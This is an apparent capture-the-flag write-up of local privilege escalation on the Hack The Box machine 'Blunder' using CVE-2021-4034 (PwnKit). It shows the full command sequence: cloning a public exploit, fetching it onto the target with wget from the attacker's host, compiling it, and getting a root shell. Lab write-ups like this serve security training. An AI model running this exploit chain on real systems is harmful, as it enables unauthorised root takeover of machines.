InfoSec LAB

Blunder_Privilege_Escalation_4

Created: 2 min read

CVE-2021-4034

Earlier, PEAS discovered that the target system is vulnerable to CVE-2021-4034

a vulnerability, which was classified as critical, has been found in polkit (version now known). This issue affects some unknown processing of the file /usr/bin/pkexec. The manipulation with an unknown input leads to a access control vulnerability. Using CWE to declare the problem leads to CWE-284. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor. Impacted is confidentiality, integrity, and availability.

exploit(pwnkit)

Exploit found online

Since there are compilers installed within the target system, I can compile the exploit locally

┌──(kali㉿kali)-[~/archive/htb/labs/blunder]
└─$ git clone https://github.com/berdav/CVE-2021-4034.git ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 1.89 MiB/s, done.
Resolving deltas: 100% (44/44), done.

Exploit package downloaded to Kali

Exploitation

www-data@blunder:/dev/shm$ wget -q http://10.10.14.17/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete over HTTP

www-data@blunder:/dev/shm/CVE-2021-4034$ make
make: Warning: File 'Makefile' has modification time 20295 s in the future
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.
make: warning:  Clock skew detected.  Your build may be incomplete.

Compile There is a warning due to the time difference

www-data@blunder:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
blunder
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.191  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:30a  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:30a  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:0a  txqueuelen 1000  (Ethernet)
        RX packets 4719451  bytes 412719361 (412.7 MB)
        RX errors 0  dropped 199  overruns 0  frame 0
        TX packets 3615333  bytes 2490262493 (2.4 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 27507  bytes 2420793 (2.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27507  bytes 2420793 (2.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks